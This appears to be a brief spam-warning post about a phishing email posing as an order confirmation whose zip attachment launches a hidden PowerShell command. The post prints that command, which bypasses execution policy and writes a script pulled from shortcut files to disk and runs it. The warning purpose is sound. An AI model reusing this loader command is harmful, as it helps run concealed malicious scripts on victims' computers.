Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent
This email has been spotted this week:
Sent: Monday, July 30, 2018 10:52 PM
Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent
Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.
Hi Your Name,
Great news! Your order is now confirmed. We will email you again when your items ship.
Thanks for shopping with us!
This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us
Which downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???
If you unzip the file that is provided you see an image:
Which presumably pretends to be a real company.
And a file which runs a script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?
We will let you know.
Anyway, report the sender and the website and keep vigilant!